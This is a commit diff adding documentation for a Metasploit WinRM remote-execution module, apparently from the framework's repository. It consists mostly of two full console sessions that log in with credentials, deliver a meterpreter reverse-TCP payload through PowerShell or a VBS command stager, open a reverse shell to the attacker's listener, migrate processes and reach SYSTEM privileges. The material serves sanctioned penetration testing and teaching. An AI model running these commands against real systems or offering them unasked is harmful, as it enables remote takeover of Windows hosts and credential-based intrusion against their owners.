Land #8130 docs for winrm_script_exec
commit
35a952490d
|
@ -0,0 +1,146 @@
|
|||
## Vulnerable Application
|
||||
|
||||
WinRM, is a Windows-native built-in remote management protocol in its simplest form that uses Simple Object Access Protocol to interface with remote computers and servers, as well as Operating Systems and applications. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol).
|
||||
This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy.
|
||||
|
||||
**IMPORTANT:** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return.
|
||||
|
||||
## Example Usage
|
||||
|
||||
### Windows 2008
|
||||
|
||||
**Powershell 2.0 is used for payload delivery here**
|
||||
|
||||
```
|
||||
msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec
|
||||
msf exploit(winrm_script_exec) > set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
msf exploit(winrm_script_exec) > set USERNAME admin
|
||||
USERNAME => admin
|
||||
msf exploit(winrm_script_exec) > set PASSWORD admin
|
||||
PASSWORD => admin
|
||||
msf exploit(winrm_script_exec) > set LHOST 192.168.198.138
|
||||
LHOST => 192.168.198.138
|
||||
msf exploit(winrm_script_exec) > set LPORT 4444
|
||||
LPORT => 4444
|
||||
msf exploit(winrm_script_exec) > set RHOST 192.168.198.130
|
||||
RHOST => 192.168.198.130
|
||||
msf exploit(winrm_script_exec) > exploit
|
||||
[*] Started reverse TCP handler on 192.168.198.138:4444
|
||||
[*] checking for Powershell 2.0
|
||||
[*] Attempting to set Execution Policy
|
||||
[+] Set Execution Policy Successfully
|
||||
[*] Grabbing %TEMP%
|
||||
[*] Uploading powershell script to C:\Users\ADMINI~1\AppData\Local\Temp\uFWUOIgQ.ps1 (This may take a few minutes)...
|
||||
[*] Attempting to execute script...
|
||||
[*] Sending stage (752128 bytes) to 192.168.198.130
|
||||
[*] Meterpreter session 1 opened (192.168.198.138:4444 -> 192.168.198.130:5985) at 2017-03-19 21:30:05 +0100
|
||||
meterpreter >
|
||||
[*] Session ID 1 (192.168.198.138:4444 -> 192.168.198.130:5985) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
|
||||
[*] Current server process: powershell.exe (608)
|
||||
[+] Migrating to 568
|
||||
[+] Successfully migrated to process
|
||||
meterpreter > sysinfo
|
||||
gComputer : WIN-JZF4OTQMX4W
|
||||
OS : Windows 2008 (Build 6002, Service Pack 2).
|
||||
Architecture : x86
|
||||
System Language : en_US
|
||||
Meterpreter : x86/win32
|
||||
meterpreter > getuid
|
||||
gServer username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > getpid
|
||||
Current pid: 568
|
||||
meterpreter >
|
||||
|
||||
```
|
||||
|
||||
**VBS CmdStager is used for payload delivery here**
|
||||
|
||||
```
|
||||
msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec
|
||||
msf exploit(winrm_script_exec) > set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
msf exploit(winrm_script_exec) > set USERNAME admin
|
||||
USERNAME => admin
|
||||
msf exploit(winrm_script_exec) > set PASSWORD admin
|
||||
PASSWORD => admin
|
||||
msf exploit(winrm_script_exec) > set LHOST 192.168.198.138
|
||||
LHOST => 192.168.198.138
|
||||
msf exploit(winrm_script_exec) > set LPORT 4444
|
||||
LPORT => 4444
|
||||
msf exploit(winrm_script_exec) > set RHOST 192.168.198.130
|
||||
RHOST => 192.168.198.130
|
||||
msf exploit(winrm_script_exec) > set FORCE_VBS true
|
||||
FORCE_VBS => true
|
||||
msf exploit(winrm_script_exec) > exploit
|
||||
[*] Started reverse TCP handler on 192.168.198.138:4444
|
||||
[*] User selected the FORCE_VBS option
|
||||
[*] Command Stager progress - 2.01% done (2046/101936 bytes)
|
||||
[*] Command Stager progress - 4.01% done (4092/101936 bytes)
|
||||
[*] Command Stager progress - 6.02% done (6138/101936 bytes)
|
||||
[*] Command Stager progress - 8.03% done (8184/101936 bytes)
|
||||
[*] Command Stager progress - 10.04% done (10230/101936 bytes)
|
||||
[*] Command Stager progress - 12.04% done (12276/101936 bytes)
|
||||
[*] Command Stager progress - 14.05% done (14322/101936 bytes)
|
||||
[*] Command Stager progress - 16.06% done (16368/101936 bytes)
|
||||
[*] Command Stager progress - 18.06% done (18414/101936 bytes)
|
||||
[*] Command Stager progress - 20.07% done (20460/101936 bytes)
|
||||
[*] Command Stager progress - 22.08% done (22506/101936 bytes)
|
||||
[*] Command Stager progress - 24.09% done (24552/101936 bytes)
|
||||
[*] Command Stager progress - 26.09% done (26598/101936 bytes)
|
||||
[*] Command Stager progress - 28.10% done (28644/101936 bytes)
|
||||
[*] Command Stager progress - 30.11% done (30690/101936 bytes)
|
||||
[*] Command Stager progress - 32.11% done (32736/101936 bytes)
|
||||
[*] Command Stager progress - 34.12% done (34782/101936 bytes)
|
||||
[*] Command Stager progress - 36.13% done (36828/101936 bytes)
|
||||
[*] Command Stager progress - 38.14% done (38874/101936 bytes)
|
||||
[*] Command Stager progress - 40.14% done (40920/101936 bytes)
|
||||
[*] Command Stager progress - 42.15% done (42966/101936 bytes)
|
||||
[*] Command Stager progress - 44.16% done (45012/101936 bytes)
|
||||
[*] Command Stager progress - 46.16% done (47058/101936 bytes)
|
||||
[*] Command Stager progress - 48.17% done (49104/101936 bytes)
|
||||
[*] Command Stager progress - 50.18% done (51150/101936 bytes)
|
||||
[*] Command Stager progress - 52.19% done (53196/101936 bytes)
|
||||
[*] Command Stager progress - 54.19% done (55242/101936 bytes)
|
||||
[*] Command Stager progress - 56.20% done (57288/101936 bytes)
|
||||
[*] Command Stager progress - 58.21% done (59334/101936 bytes)
|
||||
[*] Command Stager progress - 60.21% done (61380/101936 bytes)
|
||||
[*] Command Stager progress - 62.22% done (63426/101936 bytes)
|
||||
[*] Command Stager progress - 64.23% done (65472/101936 bytes)
|
||||
[*] Command Stager progress - 66.24% done (67518/101936 bytes)
|
||||
[*] Command Stager progress - 68.24% done (69564/101936 bytes)
|
||||
[*] Command Stager progress - 70.25% done (71610/101936 bytes)
|
||||
[*] Command Stager progress - 72.26% done (73656/101936 bytes)
|
||||
[*] Command Stager progress - 74.26% done (75702/101936 bytes)
|
||||
[*] Command Stager progress - 76.27% done (77748/101936 bytes)
|
||||
[*] Command Stager progress - 78.28% done (79794/101936 bytes)
|
||||
[*] Command Stager progress - 80.29% done (81840/101936 bytes)
|
||||
[*] Command Stager progress - 82.29% done (83886/101936 bytes)
|
||||
[*] Command Stager progress - 84.30% done (85932/101936 bytes)
|
||||
[*] Command Stager progress - 86.31% done (87978/101936 bytes)
|
||||
[*] Command Stager progress - 88.31% done (90024/101936 bytes)
|
||||
[*] Command Stager progress - 90.32% done (92070/101936 bytes)
|
||||
[*] Command Stager progress - 92.33% done (94116/101936 bytes)
|
||||
[*] Command Stager progress - 94.34% done (96162/101936 bytes)
|
||||
[*] Command Stager progress - 96.34% done (98208/101936 bytes)
|
||||
[*] Command Stager progress - 98.35% done (100252/101936 bytes)
|
||||
[*] Sending stage (752128 bytes) to 192.168.198.130
|
||||
[*] Meterpreter session 2 opened (192.168.198.138:4444 -> 192.168.198.130:5985) at 2017-03-19 21:46:05 +0100
|
||||
[*] Session ID 2 (192.168.198.138:4444 -> 192.168.1.142:49158) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
|
||||
[*] Current server process: mSPvA.exe (3548)
|
||||
[+] Migrating to 580
|
||||
[+] Successfully migrated to process
|
||||
[*] nil
|
||||
[*] Command Stager progress - 100.00% done (101936/101936 bytes)
|
||||
meterpreter > getpid
|
||||
Current pid: 580
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > sysinfo
|
||||
Computer : WIN-OPAUFTQFWTB
|
||||
OS : Windows 2008 (Build 6002, Service Pack 2).
|
||||
Architecture : x86
|
||||
System Language : en_US
|
||||
Meterpreter : x86/win32
|
||||
meterpreter >
|
||||
```
|
Loading…
Reference in New Issue